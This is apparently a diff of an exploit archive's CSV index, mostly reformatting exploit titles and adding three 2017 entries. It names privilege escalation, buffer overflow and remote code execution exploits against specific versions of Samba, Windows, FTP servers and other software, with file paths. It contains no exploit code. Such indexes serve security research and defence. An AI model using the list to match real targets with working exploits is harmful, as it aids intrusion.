1.3.0 - 'm3u' Buffer Overflow (SEH) (2)",2015-04-22,"Tomislav Paskalev",windows,local,0 36820,platforms/linux/local/36820.txt,"usb-creator 0.2.x (Ubuntu 12.04/14.04/14.10) - Privilege Escalation",2015-04-23,"Tavis Ormandy",linux,local,0 -36822,platforms/windows/local/36822.pl,"Quick Search 1.1.0.189 - 'search textbox Buffer Overflow (Unicode SEH) (Egghunter)",2015-04-23,"Tomislav Paskalev",windows,local,0 +36822,platforms/windows/local/36822.pl,"Quick Search 1.1.0.189 - search textbox Buffer Overflow (SEH Unicode) (Egghunter)",2015-04-23,"Tomislav Paskalev",windows,local,0 36826,platforms/windows/local/36826.pl,"Free MP3 CD Ripper 2.6 2.8 - '.wav' File Buffer Overflow (SEH)",2015-04-23,ThreatActor,windows,local,0 36827,platforms/windows/local/36827.py,"Free MP3 CD Ripper 2.6 2.8 (Windows 7) - '.wav' File Buffer Overflow (SEH) (DEP Bypass)",2015-04-24,naxxo,windows,local,0 36837,platforms/windows/local/36837.rb,"Apple iTunes 10.6.1.7 - '.pls' Title Buffer Overflow",2015-04-27,"Fady Mohammed Osman",windows,local,0 @@ -8772,7 +8772,7 @@ id,file,description,date,author,platform,type,port 38138,platforms/osx/local/38138.txt,"Apple Mac OSX - Install.framework suid Helper Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0 38147,platforms/windows/local/38147.pl,"Logitech Webcam Software 1.1 - 'eReg.exe' Buffer Overflow (SEH Unicode)",2015-09-11,"Robbie Corley",windows,local,0 40975,platforms/android/local/40975.rb,"Google Android - get_user/put_user Exploit (Metasploit)",2016-12-29,Metasploit,android,local,0 -38185,platforms/windows/local/38185.txt,"Total Commander 8.52 - Overwrite (SEH) Buffer Overflow",2015-09-15,Un_N0n,windows,local,0 +38185,platforms/windows/local/38185.txt,"Total Commander 8.52 - Overwrite Buffer Overflow (SEH)",2015-09-15,Un_N0n,windows,local,0 38198,platforms/windows/local/38198.txt,"Microsoft Windows 10 (Build 10130) - User Mode Font Driver Thread Permissions Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 38199,platforms/windows/local/38199.txt,"Microsoft Windows - NtUserGetClipboardAccessToken Token Leak (MS15-023)",2015-09-15,"Google Security Research",windows,local,0 38200,platforms/windows/local/38200.txt,"Microsoft Windows Task Scheduler - DeleteExpiredTaskAfter File Deletion Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 @@ -8824,8 +8824,8 @@ id,file,description,date,author,platform,type,port 38631,platforms/windows/local/38631.txt,"McAfee Data Loss Prevention - Multiple Information Disclosure Vulnerabilities",2013-06-24,"Jamie Ooi",windows,local,0 38668,platforms/windows/local/38668.c,"Cisco WebEx One-Click Client Password Encryption - Information Disclosure",2013-07-09,"Brad Antoniewicz",windows,local,0 38672,platforms/windows/local/38672.txt,"YardRadius - Multiple Local Format String Vulnerabilities",2013-06-30,"Hamid Zamani",windows,local,0 -38700,platforms/windows/local/38700.pl,"TECO SG2 LAD Client 3.51 - '.gen' Overwrite (SEH) Buffer Overflow",2015-11-16,LiquidWorm,windows,local,0 -38704,platforms/windows/local/38704.pl,"TECO JN5 L510-DriveLink 1.482 - '.lf5' Overwrite (SEH) Buffer Overflow",2015-11-16,LiquidWorm,windows,local,0 +38700,platforms/windows/local/38700.pl,"TECO SG2 LAD Client 3.51 - '.gen' Overwrite Buffer Overflow (SEH)",2015-11-16,LiquidWorm,windows,local,0 +38704,platforms/windows/local/38704.pl,"TECO JN5 L510-DriveLink 1.482 - '.lf5' Overwrite Buffer Overflow (SEH)",2015-11-16,LiquidWorm,windows,local,0 38751,platforms/windows/local/38751.txt,"IBM i Access 7.1 - Buffer Overflow Code Execution",2015-11-18,hyp3rlinx,windows,local,0 38752,platforms/windows/local/38752.c,"Watchguard Server Center - Privilege Escalation",2013-09-08,"Julien Ahrens",windows,local,0 38775,platforms/linux/local/38775.rb,"Chkrootkit - Privilege Escalation (Metasploit)",2015-11-20,Metasploit,linux,local,0 @@ -9228,12 +9228,15 @@ id,file,description,date,author,platform,type,port 42605,platforms/windows/local/42605.txt,"Lotus Notes Diagnostic Tool 8.5/9.0 - Privilege Escalation",2017-09-02,ParagonSec,windows,local,0 42611,platforms/linux/local/42611.txt,"RubyGems < 2.6.13 - Arbitrary File Overwrite",2017-09-04,mame,linux,local,0 42612,platforms/windows/local/42612.py,"Dup Scout Enterprise 9.9.14 - 'Input Directory' Local Buffer Overflow",2017-09-04,"Touhid M.Shaikh",windows,local,0 +42624,platforms/windows/local/42624.py,"Jungo DriverWizard WinDriver - Kernel Pool Overflow",2017-09-06,mr_me,windows,local,0 +42625,platforms/windows/local/42625.py,"Jungo DriverWizard WinDriver - Kernel Out-of-Bounds Write Privilege Escalation",2017-09-06,mr_me,windows,local,0 +42626,platforms/linux/local/42626.c,"Tor - Linux Sandbox Breakout via X11",2017-09-06,"Google Security Research",linux,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 7,platforms/linux/remote/7.pl,"Samba 2.2.x - Buffer Overflow",2003-04-07,"H D Moore",linux,remote,139 8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow",2003-04-08,zillion,linux,remote,0 -10,platforms/linux/remote/10.c,"Samba < 2.2.8 (Linux/BSD) - Remote Code Execution",2003-04-10,eSDee,linux,remote,139 +10,platforms/multiple/remote/10.c,"Samba < 2.2.8 (Linux/BSD) - Remote Code Execution",2003-04-10,eSDee,multiple,remote,139 16,platforms/linux/remote/16.c,"PoPToP PPTP 1.1.4-b3 - Remote Command Execution",2003-04-18,einstein,linux,remote,1723 18,platforms/linux/remote/18.sh,"Snort 1.9.1 - 'p7snort191.sh' Remote Command Execution",2003-04-23,truff,linux,remote,0 19,platforms/linux/remote/19.c,"PoPToP PPTP 1.1.4-b3 - 'poptop-sane.c' Remote Command Execution",2003-04-25,blightninjas,linux,remote,1723 @@ -9387,7 +9390,7 @@ id,file,description,date,author,platform,type,port 349,platforms/multiple/remote/349.txt,"SSH (x2) - Remote Command Execution",2002-05-01,Teso,multiple,remote,22 359,platforms/linux/remote/359.c,"Drcat 0.5.0-beta - 'drcatd' Remote Code Execution",2004-07-22,Taif,linux,remote,3535 361,platforms/windows/remote/361.txt,"Flash FTP Server - Directory Traversal",2004-07-22,CoolICE,windows,remote,0 -364,platforms/linux/remote/364.pl,"Samba 3.0.4 SWAT - Authorisation Buffer Overflow",2004-07-22,"Noam Rathaus",linux,remote,901 +364,platforms/linux/remote/364.pl,"Samba 3.0.4 - SWAT Authorisation Buffer Overflow",2004-07-22,"Noam Rathaus",linux,remote,901 372,platforms/linux/remote/372.c,"OpenFTPd 0.30.2 - Remote Exploit",2004-08-03,Andi,linux,remote,21 373,platforms/linux/remote/373.c,"OpenFTPd 0.30.1 - (message system) Remote Shell",2004-08-04,infamous41md,linux,remote,21 378,platforms/windows/remote/378.pl,"BlackJumboDog FTP Server - Remote Buffer Overflow",2004-08-05,"Tal Zeltzer",windows,remote,21 @@ -10515,7 +10518,7 @@ id,file,description,date,author,platform,type,port 9663,platforms/windows/remote/9663.py,"Mozilla Firefox 2.0.0.16 - UTF-8 URL Remote Buffer Overflow",2009-09-14,dmc,windows,remote,0 9673,platforms/windows/remote/9673.py,"BigAnt Server 2.50 - GET Request Remote Buffer Overflow (SEH)",2009-09-15,blake,windows,remote,6660 9676,platforms/windows/remote/9676.txt,"BRS Webweaver 1.33 - '/Scripts' Access Restriction Bypass",2009-09-15,"Usman Saeed",windows,remote,0 -9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 - GET Request Remote Buffer Overflow (SEH) Universal",2009-09-15,hack4love,windows,remote,6660 +9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 - GET Request Universal Remote Buffer Overflow (SEH)",2009-09-15,hack4love,windows,remote,6660 9694,platforms/windows/remote/9694.txt,"NaviCOPA Web Server 3.01 - Source Code Disclosure",2009-09-16,Dr_IDE,windows,remote,0 9704,platforms/windows/remote/9704.html,"Quiksoft EasyMail 6.0.3.0 - IMAP 'connect()' ActiveX Buffer Overflow",2009-09-17,"Sebastian Wolfgarten",windows,remote,0 9705,platforms/windows/remote/9705.html,"Quiksoft EasyMail 6 - (AddAttachment) Remote Buffer Overflow",2009-09-17,bmgsec,windows,remote,0 @@ -10560,7 +10563,7 @@ id,file,description,date,author,platform,type,port 9932,platforms/novell/remote/9932.rb,"Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow (Metasploit)",2007-01-21,toto,novell,remote,0 9934,platforms/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)",2009-07-10,kf,multiple,remote,0 9935,platforms/multiple/remote/9935.rb,"Subversion 1.0.2 - Date Overflow (Metasploit)",2004-05-19,spoonm,multiple,remote,3690 -9936,platforms/linux/remote/9936.rb,"Samba 2.2.x - nttrans Overflow (Metasploit)",2003-04-07,"H D Moore",linux,remote,139 +9936,platforms/linux/remote/9936.rb,"Samba 2.2.x - 'nttrans' Overflow (Metasploit)",2003-04-07,"H D Moore",linux,remote,139 9937,platforms/multiple/remote/9937.rb,"RealServer 7-9 - Describe Buffer Overflow (Metasploit)",2002-12-20,"H D Moore",multiple,remote,0 9939,platforms/php/remote/9939.rb,"PHP < 4.5.0 - Unserialize Overflow (Metasploit)",2007-03-01,sesser,php,remote,0 9940,platforms/linux/remote/9940.rb,"NTPd 4.0.99j-k readvar - Buffer Overflow (Metasploit)",2001-04-04,patrick,linux,remote,123 @@ -10645,7 +10648,7 @@ id,file,description,date,author,platform,type,port 10610,platforms/linux/remote/10610.rb,"CoreHTTP 0.5.3.1 - (CGI) Arbitrary Command Execution",2009-12-23,"Aaron Conole",linux,remote,0 14257,platforms/windows/remote/14257.py,"Hero DVD Remote 1.0 - Buffer Overflow",2010-07-07,chap0,windows,remote,0 10715,platforms/windows/remote/10715.rb,"HP Application Recovery Manager - 'OmniInet.exe' Buffer Overflow",2009-12-26,EgiX,windows,remote,5555 -10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 - (SEH) Exploit",2009-12-29,Lincoln,windows,remote,6660 +10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 - Exploit (SEH)",2009-12-29,Lincoln,windows,remote,6660 10791,platforms/windows/remote/10791.py,"Microsoft IIS - ASP Multiple Extensions Security Bypass 5.x/6.x",2009-12-30,emgent,windows,remote,80 10911,platforms/windows/remote/10911.py,"NetTransport Download Manager 2.90.510 - Exploit",2010-01-02,Lincoln,windows,remote,0 10973,platforms/windows/remote/10973.py,"BigAnt Server 2.52 - Remote Buffer Overflow (2)",2010-01-03,DouBle_Zer0,windows,remote,0 @@ -10756,7 +10759,7 @@ id,file,description,date,author,platform,type,port 13834,platforms/windows/remote/13834.html,"Sygate Personal Firewall 5.6 build 2808 - ActiveX with DEP Bypass",2010-06-11,Lincoln,windows,remote,0 13850,platforms/multiple/remote/13850.pl,"Litespeed Technologies - Web Server Remote Poison Null Byte Exploit",2010-06-13,kingcope,multiple,remote,80 13853,platforms/linux/remote/13853.pl,"UnrealIRCd 3.2.8.1 - Remote Downloader/Execute Trojan",2010-06-13,anonymous,linux,remote,0 -13903,platforms/windows/remote/13903.py,"File Sharing Wizard 1.5.0 - (SEH) Exploit",2010-06-17,b0nd,windows,remote,0 +13903,platforms/windows/remote/13903.py,"File Sharing Wizard 1.5.0 - Exploit (SEH)",2010-06-17,b0nd,windows,remote,0 13932,platforms/windows/remote/13932.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Full System Access",2010-06-18,"Serge Gorbunov",windows,remote,0 14360,platforms/multiple/remote/14360.txt,"Struts2/XWork < 2.2.0 - Remote Command Execution",2010-07-14,"Meder Kydyraliev",multiple,remote,0 14013,platforms/windows/remote/14013.txt,"UFO: Alien Invasion 2.2.1 - Arbitrary Code Execution",2010-06-24,"Jason Geffner",windows,remote,0 @@ -10973,7 +10976,7 @@ id,file,description,date,author,platform,type,port 16317,platforms/multiple/remote/16317.rb,"Apache Tomcat Manager - Application Deployer Authenticated Code Execution (Metasploit)",2010-12-14,Metasploit,multiple,remote,0 16318,platforms/multiple/remote/16318.rb,"JBoss JMX - Console Deployer Upload and Execute (Metasploit)",2010-10-19,Metasploit,multiple,remote,0 16319,platforms/multiple/remote/16319.rb,"JBoss JMX - Console Beanshell Deployer WAR Upload and Deployment (Metasploit)",2011-01-10,Metasploit,multiple,remote,0 -16320,platforms/unix/remote/16320.rb,"Samba - 'Username' map script' Command Execution (Metasploit)",2010-08-18,Metasploit,unix,remote,0 +16320,platforms/unix/remote/16320.rb,"Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)",2010-08-18,Metasploit,unix,remote,0 16321,platforms/linux/remote/16321.rb,"Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (1)",2010-04-28,Metasploit,linux,remote,0 16322,platforms/solaris/remote/16322.rb,"Solaris LPD - Command Execution (Metasploit)",2010-09-20,Metasploit,solaris,remote,0 16323,platforms/solaris_sparc/remote/16323.rb,"Solaris dtspcd - Heap Overflow (Metasploit)",2010-04-30,Metasploit,solaris_sparc,remote,0 @@ -11445,7 +11448,7 @@ id,file,description,date,author,platform,type,port 16875,platforms/osx/remote/16875.rb,"Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-04-05,Metasploit,osx,remote,0 16876,platforms/osx_ppc/remote/16876.rb,"Samba 2.2.8 (OSX/PPC) - 'trans2open' Overflow (Metasploit)",2010-06-21,Metasploit,osx_ppc,remote,0 16878,platforms/linux/remote/16878.rb,"ProFTPd 1.3.2 rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)",2010-12-02,Metasploit,linux,remote,0 -16880,platforms/bsd_x86/remote/16880.rb,"Samba 2.2.8 (*BSD x86) - 'trans2open' Overflow Exploit (Metasploit)",2010-06-17,Metasploit,bsd_x86,remote,0 +16880,platforms/bsd_x86/remote/16880.rb,"Samba 2.2.8 (BSD x86) - 'trans2open' Overflow Exploit (Metasploit)",2010-06-17,Metasploit,bsd_x86,remote,0 16887,platforms/linux/remote/16887.rb,"HP OpenView Network Node Manager (OV NNM) - connectedNodes.ovpl Remote Command Execution (Metasploit)",2010-07-03,Metasploit,linux,remote,0 16888,platforms/linux/remote/16888.rb,"SquirrelMail PGP Plugin - Command Execution (SMTP) (Metasploit)",2010-08-25,Metasploit,linux,remote,0 16903,platforms/php/remote/16903.rb,"OpenX - banner-edit.php Arbitrary File Upload / PHP Code Execution (Metasploit)",2010-09-20,Metasploit,php,remote,0 @@ -12221,7 +12224,7 @@ id,file,description,date,author,platform,type,port 20334,platforms/windows/remote/20334.java,"Cat Soft Serv-U FTP Server 2.5.x - Brute Force",2000-10-29,Craig,windows,remote,0 20335,platforms/windows/remote/20335.txt,"Microsoft Indexing Service (Windows 2000/NT 4.0) - '.htw' Cross-Site Scripting",2000-10-28,"Georgi Guninski",windows,remote,0 20337,platforms/unix/remote/20337.c,"tcpdump 3.4/3.5 - AFS ACL Packet Buffer Overflow",2001-01-02,Zhodiac,unix,remote,0 -20340,platforms/unix/remote/20340.c,"Samba 2.0.7 SWAT - Logging Failure",2000-11-01,dodeca-T,unix,remote,0 +20340,platforms/unix/remote/20340.c,"Samba 2.0.7 - SWAT Logging Failure",2000-11-01,dodeca-T,unix,remote,0 20354,platforms/php/remote/20354.rb,"PHP IRC Bot pbot - 'eval()' Remote Code Execution (Metasploit)",2012-08-08,Metasploit,php,remote,0 20355,platforms/windows/remote/20355.rb,"Plixer Scrutinizer NetFlow and sFlow Analyzer 9 - Default MySQL Credential (Metasploit)",2012-08-08,Metasploit,windows,remote,0 20369,platforms/hardware/remote/20369.sh,"Cisco PIX Firewall 5.2 - PASV Mode FTP Internal Address Disclosure",2000-10-03,"Fabio Pietrosanti",hardware,remote,0 @@ -12524,7 +12527,7 @@ id,file,description,date,author,platform,type,port 21021,platforms/unix/remote/21021.pl,"SSH2 3.0 - Short Password Login",2001-07-21,hypoclear,unix,remote,0 21023,platforms/cgi/remote/21023.c,"CGIWrap 2.x/3.x - Cross-Site Scripting",2001-07-22,"TAKAGI Hiromitsu",cgi,remote,0 21025,platforms/multiple/remote/21025.txt,"Proxomitron Naoko-4 - Cross-Site Scripting",2001-07-24,"TAKAGI Hiromitsu",multiple,remote,0 -21026,platforms/multiple/remote/21026.txt,"Sambar Server 4.4/5.0 - pagecount File Overwrite",2001-07-22,kyprizel,multiple,remote,0 +21026,platforms/multiple/remote/21026.txt,"Sambar Server 4.4/5.0 - 'pagecount' File Overwrite",2001-07-22,kyprizel,multiple,remote,0 21027,platforms/multiple/remote/21027.txt,"Sambar Server 4.x/5.0 - Insecure Default Password Protection",2001-07-25,3APA3A,multiple,remote,0 21029,platforms/multiple/remote/21029.pl,"Softek MailMarshal 4 / Trend Micro ScanMail 1.0 - SMTP Attachment Protection Bypass",2001-07-25,"Aidan O'Kelly",multiple,remote,0 21030,platforms/windows/remote/21030.txt,"SnapStream Personal Video Station 1.2 a - PVS Directory Traversal",2001-07-26,john@interrorem.com,windows,remote,0 @@ -12926,7 +12929,7 @@ id,file,description,date,author,platform,type,port 22178,platforms/multiple/remote/22178.xml,"Sun ONE Unified Development Server 5.0 - Recursive Document Type Definition",2003-01-15,"Sun Microsystems",multiple,remote,0 22179,platforms/multiple/remote/22179.pl,"CSO Lanifex Outreach Project Tool 0.946b - Request Origin Spoofing",2003-01-16,"Martin Eiszner",multiple,remote,0 22184,platforms/windows/remote/22184.pl,"GlobalScape CuteFTP 5.0 - LIST Response Buffer Overflow",2003-03-26,snooq,windows,remote,0 -22185,platforms/windows/remote/22185.txt,"Sambar Server 5.x - results.stm Cross-Site Scripting",2003-01-20,galiarept,windows,remote,0 +22185,platforms/windows/remote/22185.txt,"Sambar Server 5.x - 'results.stm' Cross-Site Scripting",2003-01-20,galiarept,windows,remote,0 22187,platforms/linux/remote/22187.txt,"CVS 1.11.x - Directory Request Double-Free Heap Corruption",2003-01-20,"Stefan Esser",linux,remote,0 22194,platforms/windows/remote/22194.txt,"Microsoft Windows XP/2000/NT 4.0 - Locator Service Buffer Overflow",2003-01-22,"David Litchfield",windows,remote,0 22200,platforms/multiple/remote/22200.txt,"SyGate 5.0 - Insecure UDP Source Port Firewall Bypass Weak Default Configuration",2003-01-24,"David Fernández",multiple,remote,0 @@ -12973,7 +12976,7 @@ id,file,description,date,author,platform,type,port 22351,platforms/windows/remote/22351.py,"Freefloat FTP Server - 'PUT' Command Buffer Overflow",2012-10-30,"Jacob Holcomb",windows,remote,0 22353,platforms/linux/remote/22353.c,"BitchX 1.0 - Remote 'Send_CTCP()' Memory Corruption",2003-03-06,eSDee,linux,remote,0 22355,platforms/cgi/remote/22355.txt,"Thunderstone TEXIS 3.0 - 'texis.exe' Information Disclosure",2003-03-14,sir.mordred@hushmail.com,cgi,remote,0 -22356,platforms/unix/remote/22356.c,"Samba SMB 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow",2003-03-15,flatline,unix,remote,0 +22356,platforms/unix/remote/22356.c,"Samba 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow",2003-03-15,flatline,unix,remote,0 22361,platforms/linux/remote/22361.cpp,"Qpopper 3/4 - 'Username' Information Disclosure",2003-03-11,plasmahh,linux,remote,0 22365,platforms/windows/remote/22365.pl,"Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Buffer Overflow (1)",2003-03-24,mat,windows,remote,0 22366,platforms/windows/remote/22366.c,"Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Buffer Overflow (2)",2003-03-31,ThreaT,windows,remote,0 @@ -12999,7 +13002,7 @@ id,file,description,date,author,platform,type,port 22454,platforms/linux/remote/22454.c,"AutomatedShops WebC 2.0/5.0 Script - Name Remote Buffer Overrun",2003-02-16,"Carl Livitt",linux,remote,0 22455,platforms/hardware/remote/22455.txt,"NETGEAR FM114P ProSafe Wireless Router - Rule Bypass",2003-04-03,stickler,hardware,remote,0 22462,platforms/multiple/remote/22462.txt,"Interbase 6.x - External Table File Verification",2003-04-05,"Kotala Zdenek",multiple,remote,0 -22466,platforms/windows/remote/22466.py,"BigAnt Server 2.52 SP5 - (SEH) Stack Overflow ROP-Based Exploit (ASLR + DEP Bypass)",2012-11-04,"Lorenzo Cantoni",windows,remote,0 +22466,platforms/windows/remote/22466.py,"BigAnt Server 2.52 SP5 - Stack Overflow ROP-Based Exploit (SEH) (ASLR + DEP Bypass)",2012-11-04,"Lorenzo Cantoni",windows,remote,0 22468,platforms/unix/remote/22468.c,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1)",2003-04-11,Xpl017Elz,unix,remote,0 22469,platforms/unix/remote/22469.c,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (2)",2003-04-07,c0wboy,unix,remote,0 22470,platforms/unix/remote/22470.c,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3)",2003-05-12,eDSee,unix,remote,0 @@ -13425,7 +13428,7 @@ id,file,description,date,author,platform,type,port 24065,platforms/hardware/remote/24065.java,"Siemens S55 - Cellular Telephone Sms Confirmation Message Bypass",2004-04-27,FtR,hardware,remote,0 24067,platforms/unix/remote/24067.c,"LHA 1.x - Buffer Overflow / Directory Traversal",2004-04-30,N4rK07IX,unix,remote,0 24069,platforms/windows/remote/24069.html,"Microsoft Internet Explorer 6 - Meta Data Foreign Domain Spoofing",2004-04-30,E.Kellinis,windows,remote,0 -24076,platforms/windows/remote/24076.txt,"Sambar 5.x - Open Proxy / Authentication Bypass",2003-01-30,"David Endler",windows,remote,0 +24076,platforms/windows/remote/24076.txt,"Sambar Server 5.x - Open Proxy / Authentication Bypass",2003-01-30,"David Endler",windows,remote,0 24077,platforms/windows/remote/24077.txt,"Business Objects Crystal Reports 9/10 Web Form Viewer - Directory Traversal",2004-05-03,"Imperva Application Defense Center",windows,remote,0 24079,platforms/linux/remote/24079.c,"APSIS Pound 1.5 - Remote Format String",2004-05-03,"Nilanjan De",linux,remote,0 24084,platforms/multiple/remote/24084.py,"Nagios3 - history.cgi Remote Command Execution",2013-01-13,blasty,multiple,remote,0 @@ -13455,9 +13458,9 @@ id,file,description,date,author,platform,type,port 24189,platforms/multiple/remote/24189.html,"Microsoft Internet Explorer 5.0.1 / Opera 7.51 - URI Obfuscation",2004-06-10,http-equiv,multiple,remote,0 24159,platforms/linux/remote/24159.rb,"Nagios3 - history.cgi Host Command Execution (Metasploit)",2013-01-16,Metasploit,linux,remote,0 24160,platforms/linux/remote/24160.txt,"SquirrelMail 1.x - Email Header HTML Injection",2004-05-31,"Roman Medina",linux,remote,0 -24161,platforms/windows/remote/24161.txt,"Sambar Server 6.1 Beta 2 - show.asp show Parameter Cross-Site Scripting",2004-06-01,"Oliver Karow",windows,remote,0 -24162,platforms/windows/remote/24162.txt,"Sambar Server 6.1 Beta 2 - showperf.asp title Parameter Cross-Site Scripting",2004-06-01,"Oliver Karow",windows,remote,0 -24163,platforms/windows/remote/24163.txt,"Sambar Server 6.1 Beta 2 - showini.asp Arbitrary File Access",2004-06-01,"Oliver Karow",windows,remote,0 +24161,platforms/windows/remote/24161.txt,"Sambar Server 6.1 Beta 2 - 'show.asp' show Parameter Cross-Site Scripting",2004-06-01,"Oliver Karow",windows,remote,0 +24162,platforms/windows/remote/24162.txt,"Sambar Server 6.1 Beta 2 - 'showperf.asp' title Parameter Cross-Site Scripting",2004-06-01,"Oliver Karow",windows,remote,0 +24163,platforms/windows/remote/24163.txt,"Sambar Server 6.1 Beta 2 - 'showini.asp' Arbitrary File Access",2004-06-01,"Oliver Karow",windows,remote,0 24165,platforms/linux/remote/24165.pl,"Firebird 1.0 - Remote Unauthenticated Database Name Buffer Overrun",2004-06-01,wsxz,linux,remote,0 24174,platforms/windows/remote/24174.txt,"Microsoft Internet Explorer 6 - URL Local Resource Access",2004-06-06,"Rafel Ivgi The-Insider",windows,remote,0 24179,platforms/linux/remote/24179.txt,"Roundup 0.5/0.6 - Remote File Disclosure",2004-06-08,"Vickenty Fesunov",linux,remote,0 @@ -13777,7 +13780,7 @@ id,file,description,date,author,platform,type,port 25684,platforms/hardware/remote/25684.html,"D-Link DSL Router - Remote Authentication Bypass",2005-05-19,"Francesco Orro",hardware,remote,0 25687,platforms/freebsd/remote/25687.c,"Picasm 1.10/1.12 - Error Generation Remote Buffer Overflow",2005-05-20,"Shaun Colley",freebsd,remote,0 25691,platforms/multiple/remote/25691.txt,"Warrior Kings 1.3 And Warrior Kings: Battles 1.23 - Remote Format String",2005-05-23,"Luigi Auriemma",multiple,remote,0 -25694,platforms/windows/remote/25694.txt,"Sambar Server 5.x/6.0/6.1 - results.stm indexname Cross-Site Scripting",2005-05-24,"Jamie Fisher",windows,remote,0 +25694,platforms/windows/remote/25694.txt,"Sambar Server 5.x/6.0/6.1 - 'results.stm' indexname Cross-Site Scripting",2005-05-24,"Jamie Fisher",windows,remote,0 25695,platforms/windows/remote/25695.txt,"Sambar Server 5.x/6.0/6.1 - logout RCredirect Cross-Site Scripting",2005-05-24,"Jamie Fisher",windows,remote,0 25696,platforms/windows/remote/25696.txt,"Sambar Server 5.x/6.0/6.1 - Server Referer Cross-Site Scripting",2005-05-24,"Jamie Fisher",windows,remote,0 25697,platforms/windows/remote/25697.txt,"Blue Coat Reporter 7.0/7.1 - Privilege Escalation",2005-05-24,"Oliver Karow",windows,remote,0 @@ -14714,15 +14717,15 @@ id,file,description,date,author,platform,type,port 33454,platforms/windows/remote/33454.py,"Easy Address Book Web Server 1.6 - Stack Buffer Overflow",2014-05-21,superkojiman,windows,remote,0 33471,platforms/hardware/remote/33471.txt,"D-Link DKVM-IP8 - 'auth.asp' Cross-Site Scripting",2010-01-06,POPCORN,hardware,remote,0 40344,platforms/php/remote/40344.rb,"SugarCRM 6.5.23 - REST PHP Object Injection Exploit (Metasploit)",2016-09-07,"Egidio Romano",php,remote,80 -33489,platforms/multiple/remote/33489.txt,"Ruby 1.9.1 - WEBrick Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 +33489,platforms/multiple/remote/33489.txt,"Ruby 1.9.1 - WEBrick 'Terminal Escape Sequence in Logs' Command Injection",2010-01-11,evilaliv3,multiple,remote,0 33490,platforms/multiple/remote/33490.txt,"Nginx 0.7.64 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 33497,platforms/multiple/remote/33497.txt,"AOLServer Terminal 4.5.1 - Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 -33498,platforms/multiple/remote/33498.txt,"Varnish 2.0.6 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 +33498,platforms/multiple/remote/33498.txt,"Varnish 2.0.6 - 'Terminal Escape Sequence in Logs' Command Injection",2010-01-11,evilaliv3,multiple,remote,0 33499,platforms/multiple/remote/33499.txt,"thttpd 2.24 - HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,multiple,remote,0 33500,platforms/multiple/remote/33500.txt,"mini_httpd 1.18 - HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,multiple,remote,0 33501,platforms/windows/remote/33501.txt,"Cherokee 0.99.30 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,windows,remote,0 -33502,platforms/windows/remote/33502.txt,"Yaws 1.55 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,windows,remote,0 -33503,platforms/multiple/remote/33503.txt,"Orion Application Server 2.0.7 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 +33502,platforms/windows/remote/33502.txt,"Yaws 1.55 - 'Terminal Escape Sequence in Logs' Command Injection",2010-01-11,evilaliv3,windows,remote,0 +33503,platforms/multiple/remote/33503.txt,"Orion Application Server 2.0.7 - 'Terminal Escape Sequence in Logs' Command Injection",2010-01-11,evilaliv3,multiple,remote,0 33504,platforms/multiple/remote/33504.txt,"BOA Web Server 0.94.x - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 33521,platforms/multiple/remote/33521.rb,"Symantec Workspace Streaming - Arbitrary File Upload (Metasploit)",2014-05-26,Metasploit,multiple,remote,9855 33611,platforms/windows/remote/33611.txt,"GeFest Web Home Server 1.0 - Directory Traversal",2010-02-08,Markot,windows,remote,0 @@ -15518,7 +15521,7 @@ id,file,description,date,author,platform,type,port 39554,platforms/php/remote/39554.rb,"PHP Utility Belt - Remote Code Execution (Metasploit)",2016-03-11,Metasploit,php,remote,80 39568,platforms/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Remote Exploit (Shellshock)",2016-03-16,thatchriseckert,hardware,remote,443 39569,platforms/multiple/remote/39569.py,"OpenSSH 7.2p1 - Authenticated xauth Command Injection",2016-03-16,tintinweb,multiple,remote,22 -39585,platforms/windows/remote/39585.py,"Sysax Multi Server 6.50 - HTTP File Share Overflow (SEH) Remote Code Execution (SEH)",2016-03-21,"Paul Purcell",windows,remote,80 +39585,platforms/windows/remote/39585.py,"Sysax Multi Server 6.50 - HTTP File Share Overflow Remote Code Execution (SEH)",2016-03-21,"Paul Purcell",windows,remote,80 